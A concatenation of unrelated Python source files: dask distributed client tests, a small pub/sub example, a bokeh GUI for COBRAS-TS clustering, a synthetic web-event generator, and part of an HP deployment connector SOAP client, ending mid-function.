async for future in ac:
result = await future
results.append(result)
await f()
assert set(results) == set(range(1, 11))
@gen_cluster(client=True)
async def test_as_completed_async_for_results(c, s, a, b):
futures = c.map(inc, range(10))
ac = as_completed(futures, with_results=True)
results = []
async def f():
async for future, result in ac:
results.append(result)
await f()
assert set(results) == set(range(1, 11))
assert not s.counters["op"].components[0]["gather"]
@gen_cluster(client=True)
async def test_as_completed_async_for_cancel(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(sleep, 0.3)
ac = as_completed([x, y])
async def _():
await asyncio.sleep(0.1)
await y.cancel(asynchronous=True)
c.loop.add_callback(_)
L = []
async def f():
async for future in ac:
L.append(future)
await f()
assert L == [x, y]
def test_async_with(loop):
result = None
client = None
cluster = None
async def f():
async with Client(processes=False, asynchronous=True) as c:
nonlocal result, client, cluster
result = await c.submit(lambda x: x + 1, 10)
client = c
cluster = c.cluster
loop.run_sync(f)
assert result == 11
assert client.status == "closed"
assert cluster.status == Status.closed
def test_client_sync_with_async_def(loop):
async def ff():
await asyncio.sleep(0.01)
return 1
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
assert sync(loop, ff) == 1
assert c.sync(ff) == 1
@pytest.mark.skip(reason="known intermittent failure")
@gen_cluster(client=True)
async def test_dont_hold_on_to_large_messages(c, s, a, b):
np = pytest.importorskip("numpy")
da = pytest.importorskip("dask.array")
x = np.random.random(1000000)
xr = weakref.ref(x)
d = da.from_array(x, chunks=(100000,))
d = d.persist()
del x
start = time()
while xr() is not None:
if time() > start + 5:
# Help diagnosing
from types import FrameType
x = xr()
if x is not None:
del x
rc = sys.getrefcount(xr())
refs = gc.get_referrers(xr())
print("refs to x:", rc, refs, gc.isenabled())
frames = [r for r in refs if isinstance(r, FrameType)]
for i, f in enumerate(frames):
print(
"frames #%d:" % i,
f.f_code.co_name,
f.f_code.co_filename,
sorted(f.f_locals),
)
pytest.fail("array should have been destroyed")
await asyncio.sleep(0.200)
@gen_cluster(client=True)
async def test_run_scheduler_async_def(c, s, a, b):
async def f(dask_scheduler):
await asyncio.sleep(0.01)
dask_scheduler.foo = "bar"
await c.run_on_scheduler(f)
assert s.foo == "bar"
async def f(dask_worker):
await asyncio.sleep(0.01)
dask_worker.foo = "bar"
await c.run(f)
assert a.foo == "bar"
assert b.foo == "bar"
@gen_cluster(client=True)
async def test_run_scheduler_async_def_wait(c, s, a, b):
async def f(dask_scheduler):
await asyncio.sleep(0.01)
dask_scheduler.foo = "bar"
await c.run_on_scheduler(f, wait=False)
while not hasattr(s, "foo"):
await asyncio.sleep(0.01)
assert s.foo == "bar"
async def f(dask_worker):
await asyncio.sleep(0.01)
dask_worker.foo = "bar"
await c.run(f, wait=False)
while not hasattr(a, "foo") or not hasattr(b, "foo"):
await asyncio.sleep(0.01)
assert a.foo == "bar"
assert b.foo == "bar"
@gen_cluster(client=True, nthreads=[("127.0.0.1", 2)] * 2)
async def test_performance_report(c, s, a, b):
pytest.importorskip("bokeh")
da = pytest.importorskip("dask.array")
async def f():
"""
We wrap this in a function so that the assertions aren't in the
performanace report itself
Also, we want this comment to appear
"""
x = da.random.random((1000, 1000), chunks=(100, 100))
with tmpfile(extension="html") as fn:
async with performance_report(filename=fn):
await c.compute((x + x.T).sum())
with open(fn) as f:
data = f.read()
return data
data = await f()
assert "Also, we want this comment to appear" in data
assert "bokeh" in data
assert "random" in data
assert "Dask Performance Report" in data
assert "x = da.random" in data
assert "Threads: 4" in data
assert dask.__version__ in data
@pytest.mark.asyncio
async def test_client_gather_semaphore_loop(cleanup):
async with Scheduler(port=0) as s:
async with Client(s.address, asynchronous=True) as c:
assert c._gather_semaphore._loop is c.loop.asyncio_loop
@gen_cluster(client=True)
async def test_as_completed_condition_loop(c, s, a, b):
seq = c.map(inc, range(5))
ac = as_completed(seq)
assert ac.condition._loop == c.loop.asyncio_loop
def test_client_connectionpool_semaphore_loop(s, a, b):
with Client(s["address"]) as c:
assert c.rpc.semaphore._loop is c.loop.asyncio_loop
@pytest.mark.slow
@pytest.mark.asyncio
async def test_mixed_compression(cleanup):
pytest.importorskip("lz4")
da = pytest.importorskip("dask.array")
async with Scheduler(port=0, dashboard_address=":0") as s:
async with Nanny(
s.address, nthreads=1, config={"distributed.comm.compression": None}
) as a:
async with Nanny(
s.address, nthreads=1, config={"distributed.comm.compression": "lz4"}
) as b:
async with Client(s.address, asynchronous=True) as c:
await c.get_versions()
x = da.ones((10000, 10000))
y = x + x.T
await c.compute(y.sum())
@gen_cluster(client=True)
async def test_futures_in_subgraphs(c, s, a, b):
"""Regression test of <https://github.com/dask/distributed/issues/4145>"""
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
ddf = dd.from_pandas(
pd.DataFrame(
dict(
uid=range(50),
enter_time=pd.date_range(
start="2020-01-01", end="2020-09-01", periods=50, tz="UTC"
),
)
),
npartitions=5,
)
ddf = ddf[ddf.uid.isin(range(29))].persist()
ddf["local_time"] = ddf.enter_time.dt.tz_convert("US/Central")
ddf["day"] = ddf.enter_time.dt.day_name()
ddf = await c.submit(dd.categorical.categorize, ddf, columns=["day"], index=False)
@gen_cluster(client=True)
async def test_get_task_metadata(c, s, a, b):
# Populate task metadata
await c.register_worker_plugin(TaskStateMetadataPlugin())
async with get_task_metadata() as tasks:
f = c.submit(slowinc, 1)
await f
metadata = tasks.metadata
assert f.key in metadata
assert metadata[f.key] == s.tasks.get(f.key).metadata
state = tasks.state
assert f.key in state
assert state[f.key] == "memory"
assert not any(isinstance(p, CollectTaskMetaDataPlugin) for p in s.plugins)
@gen_cluster(client=True)
async def test_get_task_metadata_multiple(c, s, a, b):
# Populate task metadata
await c.register_worker_plugin(TaskStateMetadataPlugin())
# Ensure that get_task_metadata only collects metadata for
# tasks which are submitted and completed within its context
async with get_task_metadata() as tasks1:
f1 = c.submit(slowinc, 1)
await f1
async with get_task_metadata() as tasks2:
f2 = c.submit(slowinc, 2)
await f2
metadata1 = tasks1.metadata
metadata2 = tasks2.metadata
assert len(metadata1) == 2
assert sorted(metadata1.keys()) == sorted([f1.key, f2.key])
assert metadata1[f1.key] == s.tasks.get(f1.key).metadata
assert metadata1[f2.key] == s.tasks.get(f2.key).metadata
assert len(metadata2) == 1
assert list(metadata2.keys()) == [f2.key]
assert metadata2[f2.key] == s.tasks.get(f2.key).metadata
@gen_cluster(client=True)
async def test_log_event(c, s, a, b):
# Log an event from inside a task
def foo():
get_worker().log_event("topic1", {"foo": "bar"})
assert not await c.get_events("topic1")
await c.submit(foo)
events = await c.get_events("topic1")
assert len(events) == 1
assert events[0][1] == {"foo": "bar"}
# Log an event while on the scheduler
def log_scheduler(dask_scheduler):
dask_scheduler.log_event("topic2", {"woo": "hoo"})
await c.run_on_scheduler(log_scheduler)
events = await c.get_events("topic2")
assert len(events) == 1
assert events[0][1] == {"woo": "hoo"}
# Log an event from the client process
await c.log_event("topic2", ("alice", "bob"))
events = await c.get_events("topic2")
assert len(events) == 2
assert events[1][1] == ("alice", "bob")
@gen_cluster(client=True)
async def test_annotations_task_state(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(qux="bar", priority=100):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all(
{"qux": "bar", "priority": 100} == ts.annotations for ts in s.tasks.values()
)
@pytest.mark.parametrize("fn", ["compute", "persist"])
def test_annotations_compute_time(fn):
da = pytest.importorskip("dask.array")
@gen_cluster(client=True)
async def test(c, s, a, b):
x = da.ones(10, chunks=(5,))
with dask.annotate(foo="bar"):
# Turn off optimization to avoid rewriting layers and picking up annotations
# that way. Instead, we want `compute`/`persist` to be able to pick them up.
x = await getattr(c, fn)(x, optimize_graph=False)
assert all({"foo": "bar"} == ts.annotations for ts in s.tasks.values())
test()
@pytest.mark.xfail(reason="https://github.com/dask/dask/issues/7036")
@gen_cluster(client=True)
async def test_annotations_survive_optimization(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(foo="bar"):
x = da.ones(10, chunks=(5,))
ann = x.__dask_graph__().layers[x.name].annotations
assert ann is not None
assert ann.get("foo", None) == "bar"
(xx,) = dask.optimize(x)
ann = xx.__dask_graph__().layers[x.name].annotations
assert ann is not None
assert ann.get("foo", None) == "bar"
@gen_cluster(client=True)
async def test_annotations_priorities(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(priority=15):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all("15" in str(ts.priority) for ts in s.tasks.values())
assert all(ts.priority[0] == -15 for ts in s.tasks.values())
assert all({"priority": 15} == ts.annotations for ts in s.tasks.values())
@gen_cluster(client=True)
async def test_annotations_workers(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(workers=[a.address]):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all({"workers": (a.address,)} == ts.annotations for ts in s.tasks.values())
assert all({a.address} == ts.worker_restrictions for ts in s.tasks.values())
assert a.data
assert not b.data
@gen_cluster(client=True)
async def test_annotations_retries(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(retries=2):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all(ts.retries == 2 for ts in s.tasks.values())
assert all(ts.annotations == {"retries": 2} for ts in s.tasks.values())
@gen_cluster(client=True)
async def test_annotations_blockwise_unpack(c, s, a, b):
da = pytest.importorskip("dask.array")
np = pytest.importorskip("numpy")
from dask.array.utils import assert_eq
# A flaky doubling function -- need extra args because it is called before
# application to establish dtype/meta.
scale = varying([ZeroDivisionError("one"), ZeroDivisionError("two"), 2, 2])
def flaky_double(x):
return scale() * x
# A reliable double function.
def reliable_double(x):
return 2 * x
x = da.ones(10, chunks=(5,))
# The later annotations should not override the earlier annotations
with dask.annotate(retries=2):
y = x.map_blocks(flaky_double, meta=np.array((), dtype=np.float))
with dask.annotate(retries=0):
z = y.map_blocks(reliable_double, meta=np.array((), dtype=np.float))
with dask.config.set(optimization__fuse__active=False):
z = await c.compute(z)
assert_eq(z, np.ones(10) * 4.0)
@gen_cluster(
client=True,
nthreads=[
("127.0.0.1", 1),
("127.0.0.1", 1, {"resources": {"GPU": 1}}),
],
)
async def test_annotations_resources(c, s, a, b):
da = pytest.importorskip("dask.array")
with dask.annotate(resources={"GPU": 1}):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all([{"GPU": 1} == ts.resource_restrictions for ts in s.tasks.values()])
assert all([{"resources": {"GPU": 1}} == ts.annotations for ts in s.tasks.values()])
@gen_cluster(
client=True,
nthreads=[
("127.0.0.1", 1),
("127.0.0.1", 1, {"resources": {"GPU": 1}}),
],
)
async def test_annotations_resources_culled(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones((2, 2, 2), chunks=1)
with dask.annotate(resources={"GPU": 1}):
y = x.map_blocks(lambda x0: x0, meta=x._meta)
z = y[0, 0, 0]
(z,) = c.compute([z], optimize_graph=False)
await z
# it worked!
@gen_cluster(client=True)
async def test_annotations_loose_restrictions(c, s, a, b):
da = pytest.importorskip("dask.array")
# Eventually fails if allow_other_workers=False
with dask.annotate(workers=["fake"], allow_other_workers=True):
x = da.ones(10, chunks=(5,))
with dask.config.set(optimization__fuse__active=False):
x = await x.persist()
assert all(not ts.worker_restrictions for ts in s.tasks.values())
assert all({"fake"} == ts.host_restrictions for ts in s.tasks.values())
assert all(
[
{"workers": ("fake",), "allow_other_workers": True} == ts.annotations
for ts in s.tasks.values()
]
)
@gen_cluster(client=True)
async def test_workers_collection_restriction(c, s, a, b):
da = pytest.importorskip("dask.array")
future = c.compute(da.arange(10), workers=a.address)
await future
assert a.data and not b.data
|
example_publisher.py
|
import proccom
from threading import Thread
import time
def break_cmd():
stop = False
while not stop:
a = input()
if a == 'q':
stop = True
def main():
break_thread = Thread(target=break_cmd, daemon=False)
break_thread.start()
publisher = proccom.Publisher('test_topic', 'test_publisher', proccom.msgs.format_test)
publisher.connect()
stop = False
while not stop:
time.sleep(1)
publisher.publish(1, 2, 3)
if not break_thread.is_alive():
stop = True
publisher.stop()
if __name__ == '__main__':
main()
|
main.py
|
import os, sys
from threading import Thread, Timer
from bokeh.layouts import column, row
from bokeh.models import Button
from bokeh.plotting import curdoc, figure
from bokeh.models.widgets import Div
from functools import partial
try:
import datashader
except ImportError:
datashader = None
print("\n\nThe datashader package needs to be installed from source to use the GUI:\n"
"$ pip install git+ssh://git@github.com/bokeh/datashader.git@0.6.5#egg=datashader-0.6.5\n\n")
if datashader is None:
sys.exit(1)
try:
from cobras_ts.querier.visualquerier import VisualQuerier
from cobras_ts.cobras_kshape import COBRAS_kShape
from cobras_ts.cli import create_parser, prepare_data, prepare_clusterer
except ImportError:
sys.path.append(os.path.join(os.path.abspath(os.path.dirname(__file__)), os.pardir, os.pardir))
from cobras_ts.querier.visualquerier import VisualQuerier
from cobras_ts.cobras_kshape import COBRAS_kShape
import random
import numpy as np
import pandas as pd
import sys
def communicate_query_result(query_result):
global querier
querier.query_result = query_result
querier.query_answered = True
curdoc().title = "COBRAS-TS"
loading = Div(text="""<h3>Loading...<h3>""", width=100, height=100)
def mustlink_callback():
global query_answered
global querier
global layout
global button_ml
global button_cl
button_ml.disabled = True
button_cl.disabled = True
layout.children[1].children[1].children[1] = loading
t = Timer(0.1, partial(communicate_query_result, query_result=True))
t.start()
#querier.query_answered = True
#querier.query_result = True
def cannotlink_callback():
global query_answered
global querier
global layout
layout.children[1].children[1].children[1] = loading
button_ml.disabled = True
button_cl.disabled = True
t = Timer(0.1, partial(communicate_query_result, query_result=False))
t.start()
#querier.query_answered = True
#querier.query_result = False
button_ml = Button(label="Yes (must-link)", button_type="success")
button_ml.on_click(mustlink_callback)
button_cl = Button(label="No (cannot-link)", button_type="warning")
button_cl.on_click(cannotlink_callback)
random.seed(123)
np.random.seed(123)
query_answered = False
sys.argv = sys.argv[1].split(' ')
parser = create_parser()
args = parser.parse_args(None)
series, labels = prepare_data(**vars(args))
doc = curdoc()
# reformat the data into an appropriate DataFrame
dfs = []
split = pd.DataFrame({'x': [np.nan]})
for i in range(len(series)):
x = list(range(len(series[0])))
y = series[i]
df3 = pd.DataFrame({'x': x, 'y': y})
dfs.append(df3)
dfs.append(split)
df2 = pd.concat(dfs, ignore_index=True)
x_range = 0, series.shape[1]
y_range = series[1:].min(), series[1:].max()
all_data_plot = figure(plot_width=400, plot_height=180, x_range=x_range, y_range=y_range, title="Full dataset",toolbar_location='above')
p = figure(plot_width=400, plot_height=180, x_range=x_range, y_range=y_range, title="Full dataset",toolbar_location='above')
canvas = datashader.Canvas(x_range=x_range, y_range=y_range,
plot_height=180, plot_width=400)
agg = canvas.line(df2, 'x', 'y', datashader.count())
img = datashader.transfer_functions.shade(agg, how='eq_hist')
all_data_plot.image_rgba(image=[img.data], x=x_range[0], y=y_range[0], dw=x_range[1] - x_range[0], dh=y_range[1] - y_range[0])
p.image_rgba(image=[img.data], x=x_range[0], y=y_range[0], dw=x_range[1] - x_range[0], dh=y_range[1] - y_range[0])
initial_temp_clustering = row(p)
topdiv = Div(text="<h1> COBRAS<sup>TS</sup> <br> iteration: 1 <br> # queries answered: 0 </h1>", css_classes=['top_title_div'],
width=500, height=100)
div = Div(text="<h2> The full dataset </h2>", css_classes=['title_div'],
width=200, height=100)
div2 = Div(text="<h2> Should these two instances be in the same cluster? </h2>", css_classes=['title_div'],
width=500, height=100)
div3 = Div(text="<h2> The (intermediate) clustering </h2>", css_classes=['title_div'],
width=400, height=100)
div4 = Div(text="", css_classes=['title_div'],width=400, height=100)
ts1 = figure(x_axis_type="datetime", plot_width=250, plot_height=120, toolbar_location=None) # placeholders
ts2 = figure(x_axis_type="datetime", plot_width=250, plot_height=120, toolbar_location=None)
layout = column(row(topdiv), row(column(div, all_data_plot), column(div2, row(ts1, ts2), column(button_ml, button_cl))), div3, initial_temp_clustering, div4)
curdoc().add_root(layout)
querier = VisualQuerier(series, curdoc(), layout)
#clusterer = COBRAS_kShape(series, querier, 100000)
clusterer_args = vars(args)
clusterer = prepare_clusterer(data=series, querier=querier, **clusterer_args)
def blocking_task():
clusterer.cluster()
thread = Thread(target=blocking_task)
thread.start()
|
event_stream_generator.py
|
__author__ = 'Bohdan Mushkevych'
import datetime
import random
import time
import math
from threading import Thread
from amqp import AMQPError
from db.model.raw_data import RawData
from synergy.mq.flopsy import Publisher
from synergy.system.performance_tracker import SimpleTracker
from synergy.system.synergy_process import SynergyProcess
SLEEP_TIME = 0.05
TICK_INTERVAL = 10
class EventStreamGenerator(SynergyProcess):
""" illustration suite worker:
- emulates user activity on the web site """
def __init__(self, process_name):
super(EventStreamGenerator, self).__init__(process_name)
self.main_thread = None
self.publisher = Publisher(process_name)
self.performance_tracker = SimpleTracker(self.logger)
self.previous_tick = time.time()
self.thread_is_running = True
utc_date = datetime.datetime.utcnow()
self.number_of_groups = utc_date.year * math.pow(10, 12) + \
utc_date.month * math.pow(10, 10) + \
utc_date.day * math.pow(10, 8) + \
utc_date.hour * math.pow(10, 6) + \
utc_date.minute * math.pow(10, 4) + \
utc_date.second * math.pow(10, 2)
self.logger.info(f'Started {self.process_name}')
def __del__(self):
self.publisher.close()
self.performance_tracker.cancel()
super(EventStreamGenerator, self).__del__()
self.logger.info('Exiting main thread. All auxiliary threads stopped.')
def _generate_key(self):
_id = random.randint(0, 100000)
domain_name = 'domain{0}__com'.format(_id)
session_no = self.number_of_groups + random.randint(0, 99)
session_id = 'session_{0}'.format(session_no)
return domain_name, time.time(), session_id
def _run_stream_generation(self):
self.logger.info('Stream Generator: ON. Expected rate: {0}/s, {1}/m, {2}/h, {3}/d'
.format(1 / SLEEP_TIME, 1 / SLEEP_TIME * 60, 1 / SLEEP_TIME * 3600, 1 / SLEEP_TIME * 86400))
self.performance_tracker.start()
random.seed('RANDOM_SEED_OBJECT')
document = RawData()
while self.thread_is_running:
if time.time() - self.previous_tick > TICK_INTERVAL:
# increment group number every TICK_INTERVAL seconds
self.number_of_groups += 100
self.previous_tick = time.time()
try:
document.key = self._generate_key()
document.ip = '{0}.{1}.{2}.{3}'.format(random.randint(0, 255),
random.randint(0, 255),
random.randint(0, 255),
random.randint(0, 255))
document.screen_resolution = (random.randrange(340, 1080, 100), random.randrange(240, 980, 100))
if self.performance_tracker.tracker.success.per_tick % 7 == 0:
document.os = 'OSX'
document.browser = 'Safari-10'
document.language = 'en_us'
document.country = 'usa'
elif self.performance_tracker.tracker.success.per_tick % 5 == 0:
document.os = 'Linux'
document.browser = 'FireFox-40'
document.language = 'en_ca'
document.country = 'canada'
elif self.performance_tracker.tracker.success.per_tick % 3 == 0:
document.os = 'Windows'
document.browser = 'IE-60'
document.language = 'ge_de'
document.country = 'germany'
else:
document.os = 'Android'
document.browser = 'FireMini-20'
document.language = 'es'
document.country = 'eu'
document.is_page_view = True
self.publisher.publish(document.document)
self.performance_tracker.tracker.increment_success()
time.sleep(SLEEP_TIME)
except (AMQPError, IOError) as e:
self.thread_is_running = False
self.performance_tracker.cancel()
self.logger.error(f'AMQPError: {e}')
except Exception as e:
self.performance_tracker.tracker.increment_failure()
self.logger.info(f'safety fuse: {e}')
def start(self, *_):
self.main_thread = Thread(target=self._run_stream_generation)
self.main_thread.start()
def cancel(self):
self.thread_is_running = False
if __name__ == '__main__':
from constants import PROCESS_STREAM_GEN
generator = EventStreamGenerator(PROCESS_STREAM_GEN)
generator.start()
|
deployment_connector.py
|
#
# deployment_connector.py
#
# Copyright 2009 Hewlett-Packard Development Company, L.P.
#
# Hewlett-Packard and the Hewlett-Packard logo are trademarks of
# Hewlett-Packard Development Company, L.P. in the U.S. and/or other countries.
#
# Confidential computer software. Valid license from Hewlett-Packard required
# for possession, use or copying. Consistent with FAR 12.211 and 12.212,
# Commercial Computer Software, Computer Software Documentation, and Technical
# Data for Commercial Items are licensed to the U.S. Government under
# vendor's standard commercial license.
#
# Author:
# James Abendroth
# Mohammed M. Islam
#
# Description:
# AresLite deployment connector class. Connects to an RDP instance using the
# AresLite SOAP web service.
#
# mxnodesecurity -a -p dsc_rdp -c userid:pw -n <ip-address>
#
#####################################################
from util import catalog
from util.config import config, crypy
#from util import config, catalog, password
#from util.error import error
from suds.client import Client
from suds import WebFault
import suds
import suds.sax.parser
import suds.umx.basic
from logging import getLogger
from threading import Thread, Semaphore
from M2Crypto import SSL
#from vmware import VirtualCenter
#from hp.proliant.cluster import Cluster
from time import sleep
from util.resource import resource
from vmware.vcenter import vCenter, ManagedObjectRef
log = getLogger(__name__)
JOB_STATUS_MESSAGES = {
'-5': 'Job Removed',
'-4': 'Unknown',
'-3': 'Not scheduled',
'-2': 'Scheduled but not started',
'-1': 'In progress',
'0': 'Successful',
'1': 'Failed'
}
DC_STATUS_NO_SIM = 0
DC_STATUS_NO_CREDENTIALS = 1
DC_STATUS_NO_ARESLITE = 2
DC_STATUS_UNKNOWN = 3
DC_STATUS_LOGIN_FAILED = 4
DC_STATUS_INSUFFICIENT_PRIVILEGE = 5
DC_STATUS_CONNECT_FAILED = 6
DC_STATUS_DC_CREDENTIALS = 7
DC_STATUS_DEPLOYMENT_RUNNING = 8
DC_STATUS_DEPLOYMENT_FINISHED = 9
DC_STATUS_CONNECTION_LOST = 10
DC_MESSAGES = (
'HP SIM settings must be correctly configured before deployment can be used.',
'HP SIM credentials must be configured before deployment can be used.',
'The HP Deployment Connector must be installed on the HP SIM server.',
'An unknown error occurred while contacting the deployment server.',
'Deployment server login failed. Please check the HP SIM credentials.',
'The HP SIM credentials supplied do not have sufficient privileges to access the deployment server.',
'HP Insight Control for vCenter was unable to connect to HP SIM.',
'The deployment connector username and password is has not been created in HP SIM.',
'Deployment is in progress.',
'The deployment process has finished.',
'Insight Control for vCenter has lost connection to the deployment server. Please check the deployment console.',
)
# This is a list of errors from the AresLite spec. The messages have been updated to be more user-friendly.
DC_ERRORS = {
'1020':'Insufficient privileges',
'1021':'Invalid logon token',
'1022':'Invalid session',
'1111':'Bad deployment server type',
'1112':'Bad deployment server IP address',
'1100':'No deployment server',
'1101':'Deployment server non-responsive',
'1102':'Deployment server timeout',
'1105':'Deployment server access problem',
'1106':'Deployment server returned nothing',
'1107':'Deployment server credentials not found',
'1110':'Deployment server credentials were not accepted',
'1111':'Bad deployment server type',
'1112':'Bad deployment server IP address',
'1150':'Deployment server xml format error',
'1151':'Deployment server parsing error',
'1152':'Deployment server unexpected error',
'1300':'Target system not found',
'1301':'Target system not responsive',
'1302':'Target system UUID bad',
'1307':'Target system UUID in bad format',
'1330':'Target system in wrong lifecycle state',
'1400':'Folder not found',
'1402':'An empty folder was submitted',
'1403':'Some jobs in the folder encountered a problem',
'1404':'All jobs in the folder encountered a problem',
'1550':'Bad folder ID',
'1600':'Bad personalization data',
'1601':'Personalization data was ignored by the deployment server',
'1703':'Schedule ID could not be created',
'1900':'Input parameter bad',
'1910':'Input parameter bad',
'1911':'Cannot resolve deployment server',
'2000':'Unknown error',
'2001':'Unexpected error',
'2010':'Interface not supported by access layer',
'2020':'Deployment connector doesn\'t support deployment server version'
}
ADDTOVC_NOT_STARTED = 'Not started'
RECONFIGURE_NOT_SPECIFIED = 'Reconfigure not specified'
from suds.plugin import MessagePlugin
class MyPlugin(MessagePlugin):
def sending(self, context):
#log.debug( context.envelope )
pass
def marshalled(self, context):
#log.debug("***************** marshalled Before Pruning")
#log.debug( context.envelope )
context.envelope[1].prune()
#log.debug("***************** marshalled After Pruning")
#log.debug( context.envelope )
def parsed(self, context):
#log.debug("----------------- parsed Before Pruning")
#log.debug( context.reply )
context.reply.prune()
#context.reply.getChild('dnsSuffixes').prune()
#context.reply.getChild('winsServers').prune()
#context.reply.getChild('dnsServers').prune()
#log.debug("----------------- parsed Received After Pruning")
#log.debug( context.reply )
class ALDeploymentConnector:
def __init__(self):
self._client = None
self.sk = None
self.host = None
self.deployment_sem = Semaphore(value=1)
self.monitor_sem = Semaphore(value=1)
self.failures = 0
# Deployment server type - right now all we support is "RDP"
self.ds_type = "RDP"
# Keep track of what state we are in (i.e. no SIM config, no credentials, no AL connector).
self.dc_status = None
# Items that we want to keep track of from the service. It takes a while to get information,
# so we need to cache some data locally.
self.managedNodes = []
self.jobFolders = None
# TODO: Get SIM/RDP info from config file.
#sim_cfg = config.get().sim
cfg = config()
srvcfg = cfg.get_server_config()
self.simport = srvcfg['hpsim']['port']
self.simpw = cfg.get_simpw()
if self.simpw and self.simport:
self.host = self.simpw['host']
#if sim_cfg and 'host' in sim_cfg[0]:
# self.host = sim_cfg[0].host
else:
# We can't go any further without a SIM host.
self.dc_status = DC_STATUS_NO_SIM
self._dc_error("SIM not configured.")
return
try:
# Import the WSDL and create the service.
wsdl = 'file://' + resource('Alc1_0.wsdl')
#wsdl = ALDeploymentConnector.alc_service(self.host, str(int(self.simport) + 1)) + '?wsdl'
log.debug(wsdl)
#self._client = Client(wsdl)
self._client = Client(wsdl, plugins=[MyPlugin()])
service_url = ALDeploymentConnector.alc_service(self.host, str(int(self.simport) + 1))
self._client.set_options(location=service_url)
self.login()
if self.sk:
log.info("calling discoverDeploymentServer")
self.discoverDeploymentServer()
log.info("Deployment server adapter created.")
except Exception as err:
self.dc_status = DC_STATUS_UNKNOWN
self._dc_error(err)
def getDcStatus(self):
obj = {}
# First check to see if deployment is running.
if self.deployment_running():
self.dc_status = DC_STATUS_DEPLOYMENT_RUNNING
obj['errno'] = self.dc_status
try:
obj['message'] = DC_MESSAGES[self.dc_status]
except:
obj['message'] = ''
return obj
@staticmethod
def alc_service(host, port='50001'):
return ("https://%s:%s/mxsoap/services/Alc1_0" % (host, port))
def _dc_error(self, obj):
try:
#TODO
log. error("Deployment Connector Error: %s", (obj))
except:
pass
def destroy(self):
catalog.remove(self)
try:
self._client.service.logout(self.sk)
except Exception as ex:
pass
@staticmethod
def create():
def new():
dc = [x for x in catalog.get_all() if isinstance(x, ALDeploymentConnector)]
if dc:
# Don't do anything if deployment is running.
if dc[0].deployment_running():
return
dc[0].destroy()
log.info("Creating ALDeploymentConnector()")
dc = ALDeploymentConnector()
url = ALDeploymentConnector.alc_service(dc.host, dc.simport)
catalog.insert(dc, url)
t = Thread(target=new)
t.daemon = True
t.start()
# AresLite web service methods #
def discoverDeploymentServer(self):
log.info("discoverDeploymentServer(), calling getJobFolders()")
self.getJobFolders()
self.getManagedNodes()
#for node in self.managedNodes:
# self.getManagedNodeDetails(node['uuid'])
def _get_node(self, uuid):
try:
node = [x for x in self.managedNodes if x['uuid'] == uuid]
return node[0]
except:
return None
def login(self):
#TODO: SIM credentials from settings?
#entry = [x for x in config.get().sim if x.host == self.host][0]
#if (not entry.enabled):
# return
#user = entry.username or '*'
#pw = password.find(user, entry.host, password.SIM)
# TODO
cfg = config()
simpw = cfg.get_simpw()
try:
# TODO
#loginResult = self._client.service.login(pw.username, pw.password)
loginResult = self._client.service.login(simpw['username'], crypy().decode(simpw['epassword']))
if loginResult.returnCode == 0:
self.sk = loginResult.token
elif loginResult.returnCode in (1001, 1010, 1011):
self.dc_status = DC_STATUS_LOGIN_FAILED
elif loginResult.returnCode == 1020:
self.dc_status = DC_STATUS_INSUFFICIENT_PRIVILEGE
else:
self.dc_status = DC_STATUS_UNKNOWN
except Exception as ex:
# Check to see if we received a soap fault back from the service. This means that we are probably talking
# to a SIM server, but we don't have the deployment connector installed.
if hasattr(ex, 'fault'):
self.dc_status = DC_STATUS_NO_ARESLITE
self._dc_error(ex.fault.faultstring)
log.error('Unable to login to SIM due to fault: %s', ex.fault.faultstring)
return
if hasattr(ex, 'reason'):
self.dc_status = DC_STATUS_CONNECT_FAILED
self._dc_error(ex.reason)
log.error('Unable to login to SIM: %s', ex.reason)
return
log.exception('Unable to login to SIM')
self.dc_status = DC_STATUS_UNKNOWN
def _parseJobFolders(self, folders):
self.jobFolders = []
for folder in folders:
# Filter out the default RDP top-level folders. These folders cannot be run.
if folder.name in ("System Jobs", "HP Deployment Toolbox"):
continue
folder_obj = {}
folder_obj['name'] = folder.name
folder_obj['id'] = folder.id
# TODO: Saved folders need to go in the config file.
#saved_folders = config.get().rdpjobfolders
#saved_folder = [x for x in saved_folders if x['name']==folder.name]
saved_folder = None
if saved_folder:
saved_folder = saved_folder[0]
folder_obj['type'] = saved_folder['type']
else:
if folder.name.lower().find('esxi') > -1:
folder_obj['type'] = 'ESXi'
else:
folder_obj['type'] = 'ESX'
self.jobFolders.append(folder_obj)
def getJobFolders(self, refresh=False):
if self._client == None or self.sk == None:
return None
try:
if not self.jobFolders or refresh:
#import logging
#cur_level = logging.getLogger('suds').level
#logging.getLogger('suds').setLevel(10)
response = self._client.service.listFolders(self.sk, self.host, self.ds_type)
log.debug("got listFolders()")
log.debug(response)
#logging.getLogger('suds').setLevel(cur_level)
if response.returnCode == 0:
log.debug('Parsing jobFolders')
self._parseJobFolders(response.folders)
elif response.returnCode in (1021, 1022):
self.login()
return self.getJobFolder(refresh)
else:
if hasattr(response, 'errorCode'):
self._dc_error(response.errorCode)
return self.jobFolders
except WebFault as wf:
self._dc_error(wf)
return None
# This function is called from the wizard - it updates the folder types based on the user's selection.
def updateJobFolders(self, folders):
if folders:
self.jobFolders = folders
for folder in folders:
# TODO
#config.get().update_rdp_folder(folder)
pass
# Remove any config references to folders that no longer exist.
"""
for folder in config.get().rdpjobfolders:
f = [x for x in self.jobFolders if x['name'] == folder.name]
if not f:
config.get().rdpjobfolders.remove(folder)
config.save()
"""
def _parseNodeList(self, nodeList):
# Wipe out the current list so we can rebuild.
self.managedNodes = []
for node in nodeList:
entry = {}
entry['uuid'] = node.uuid
entry['name'] = node.name
entry['id'] = node.id
entry['jobs'] = []
